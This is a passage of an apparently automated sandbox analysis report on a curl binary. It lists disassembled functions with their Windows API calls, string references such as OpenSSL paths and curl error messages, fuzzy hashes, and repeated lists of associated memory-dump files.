                                                                                                                                                                    • Opcode Fuzzy Hash: 4e0c96c6f519e13e664bd65abd7934ff06d639df8c52958e0cadf4ab925f4b9a
                                                                                                                                                                    • Instruction Fuzzy Hash: F9F0E2F67022103AD6111721AC0ABEB679C8BD4762F10402BFA15C2281EB74AA115662
                                                                                                                                                                    Function 00205310 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • send.WS2_32(?,?,00000003,00000000), ref: 0020533A
                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00205344
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLastsend
                                                                                                                                                                    • String ID: SENT$Sending data failed (%d)
                                                                                                                                                                    • API String ID: 1802528911-3459338696
                                                                                                                                                                    • Opcode ID: 6002c9a65ecb6926d5db6e12400f1a3d429a784b880353c703d78591851bf57c
                                                                                                                                                                    • Instruction ID: 949b52e0ab3dd5a5fb14c976e71c3a2105fb48ec962543184b9b7528ccee483e
                                                                                                                                                                    • Opcode Fuzzy Hash: 6002c9a65ecb6926d5db6e12400f1a3d429a784b880353c703d78591851bf57c
                                                                                                                                                                    • Instruction Fuzzy Hash: E8F0F07524A701ABD2159B28BC48E5BBBECDBDC711F18081DF984D3392C2218908DBB3
                                                                                                                                                                    Function 002C40F8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,002C4137,00000000,?,002C9012,000000FF,0000001E,00307E48,00000008,002C8F76,00000000,00000000), ref: 002C4107
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CorExitProcess), ref: 002C4119
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                    • API String ID: 1646373207-1276376045
                                                                                                                                                                    • Opcode ID: 39a06f781861dc8a1b6575bb2391198b2ad91d9b941681caf08c098d65fbd1fa
                                                                                                                                                                    • Instruction ID: ce9430fb9836a50bff95a21df9ecc6e973ecdad89c30e52fbc01170be439be43
                                                                                                                                                                    • Opcode Fuzzy Hash: 39a06f781861dc8a1b6575bb2391198b2ad91d9b941681caf08c098d65fbd1fa
                                                                                                                                                                    • Instruction Fuzzy Hash: 6CD05B30794609BBDB20AFA1DC05F5AB7ACDB55743F0402A6BD0CD0150DB71DE219A60
                                                                                                                                                                    Function 002B4250 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 14COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindWindowA.USER32(Pageant,Pageant), ref: 002B425A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FindWindow
                                                                                                                                                                    • String ID: $G6$Pageant$Pageant
                                                                                                                                                                    • API String ID: 134000473-3810977514
                                                                                                                                                                    • Opcode ID: 3cebb841c86bb08d1b4b59fbeb7e7f5d349be47fba5a33c0893de9886c1cca2f
                                                                                                                                                                    • Instruction ID: 9ebbfc1a6988a9091e15f04b73ae8c090dd1ffd0fc11ae0f005a1e3873f2773a
                                                                                                                                                                    • Opcode Fuzzy Hash: 3cebb841c86bb08d1b4b59fbeb7e7f5d349be47fba5a33c0893de9886c1cca2f
                                                                                                                                                                    • Instruction Fuzzy Hash: DCD01774A007018FCB01DF38C94CB893BE0BB56724F05C2A4F0588B2E5E7B0D800AB45
                                                                                                                                                                    Function 00221950 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 216COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 002C144E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,?,00000000,?,000003E8,00000000), ref: 002C1457
                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 002219CF
                                                                                                                                                                    Strings
                                                                                                                                                                    • ..\..\openssl\openssl\ssl\s23_clnt.c, xrefs: 00221BFA
                                                                                                                                                                    • ..\..\openssl\openssl\ssl\s23_clnt.c, xrefs: 00221C10
                                                                                                                                                                    • f#, xrefs: 002219A0
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$ErrorFileLastSystem
                                                                                                                                                                    • String ID: f#$..\..\openssl\openssl\ssl\s23_clnt.c$..\..\openssl\openssl\ssl\s23_clnt.c
                                                                                                                                                                    • API String ID: 2781989572-2465991077
                                                                                                                                                                    • Opcode ID: 2e55aae009a72f77d1de03809d796e0cf66dd13f6c61445708e62628286ee0a0
                                                                                                                                                                    • Instruction ID: 75950e2853a22b1a4cdd69d2f84e6c512e24312666404ad084dfd99ab98d84a2
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e55aae009a72f77d1de03809d796e0cf66dd13f6c61445708e62628286ee0a0
                                                                                                                                                                    • Instruction Fuzzy Hash: A4711934761711ABE7209FA4E991F5B73E5AFA4704F04082DF9468B2C1EBB4E870CB42
                                                                                                                                                                    Function 002C4FD3 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetConsoleMode.KERNEL32(?), ref: 002C508A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConsoleMode
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4145635619-0
                                                                                                                                                                    • Opcode ID: 9acd010bf8085c4c62cf4ae72febb73eba15595c8783476c2be28516aa707616
                                                                                                                                                                    • Instruction ID: a9c32a98e46a1355f9306443f5a634ae4ca35839526c24d316ec68ffb5c5d331
                                                                                                                                                                    • Opcode Fuzzy Hash: 9acd010bf8085c4c62cf4ae72febb73eba15595c8783476c2be28516aa707616
                                                                                                                                                                    • Instruction Fuzzy Hash: D421A671921526DFCB119FA59C54FBE77ACAB08311F14432FE902D21A1C630ED91DBE1
                                                                                                                                                                    Function 001DDEA0 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003), ref: 001DDF02
                                                                                                                                                                    • VerifyVersionInfoA.KERNEL32(?,00000002,00000000), ref: 001DDF11
                                                                                                                                                                    • getsockopt.WS2_32(?,0000FFFF,00001001,?,?), ref: 001DDF61
                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 001DDF87
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionInfoMaskVerifyVersiongetsockoptsetsockopt
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3307559826-0
                                                                                                                                                                    • Opcode ID: 1c0f74725b590fde91daaaa4404c6af69eb532ad7064f99e50d0b3d5a6738c3e
                                                                                                                                                                    • Instruction ID: ba5686b5e48b808272d0ab50b52cc2356cc4201d306847d8d6ce2534633e476b
                                                                                                                                                                    • Opcode Fuzzy Hash: 1c0f74725b590fde91daaaa4404c6af69eb532ad7064f99e50d0b3d5a6738c3e
                                                                                                                                                                    • Instruction Fuzzy Hash: A7218EB0608301ABE720DF10EC8AFAB77E8AF84700F40451AF686C62D1D7B9D9458B93
                                                                                                                                                                    Function 002CDBB5 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,001D369D,00000000,00000000), ref: 002CDBEF
                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,?,?), ref: 002CDC03
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 002CDC09
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FilePointer$ErrorLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 142388799-0
                                                                                                                                                                    • Opcode ID: a80bf46073817d2a1d64236057efd5b2ca25746af4fa6149ce8df99ad98fdf17
                                                                                                                                                                    • Instruction ID: 0fa6645c8cb661bd3d69659d9fe92aa3fc9d13fa7d8f9efb02ca166e4357d345
                                                                                                                                                                    • Opcode Fuzzy Hash: a80bf46073817d2a1d64236057efd5b2ca25746af4fa6149ce8df99ad98fdf17
                                                                                                                                                                    • Instruction Fuzzy Hash: B711B232934619ABDB119FA89C84FED376CAB41724F114259F520A71D1E7B0E9209B64
                                                                                                                                                                    Function 001EEBB0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 218COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Can't open %s for writing, xrefs: 001EECA1
                                                                                                                                                                    • Can't get the size of %s, xrefs: 001EED1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: Can't get the size of %s$Can't open %s for writing
                                                                                                                                                                    • API String ID: 1927824332-3544860555
                                                                                                                                                                    • Opcode ID: 77b5199a8658e3089de586c9419640cd75bfbf4882ab6bbac09e46467cd412fb
                                                                                                                                                                    • Instruction ID: e460623712469410497b942808064199aa392a1b4100fe63c59a203becb02e54
                                                                                                                                                                    • Opcode Fuzzy Hash: 77b5199a8658e3089de586c9419640cd75bfbf4882ab6bbac09e46467cd412fb
                                                                                                                                                                    • Instruction Fuzzy Hash: 3571AE71B04B408FD718DF29DC81AAFB7E5FF98304F05492EF99A87241EB35A9148B42
                                                                                                                                                                    Function 001DBBD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Couldn't resolve proxy '%s', xrefs: 001DBD37
                                                                                                                                                                    • Couldn't resolve host '%s', xrefs: 001DBDA9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
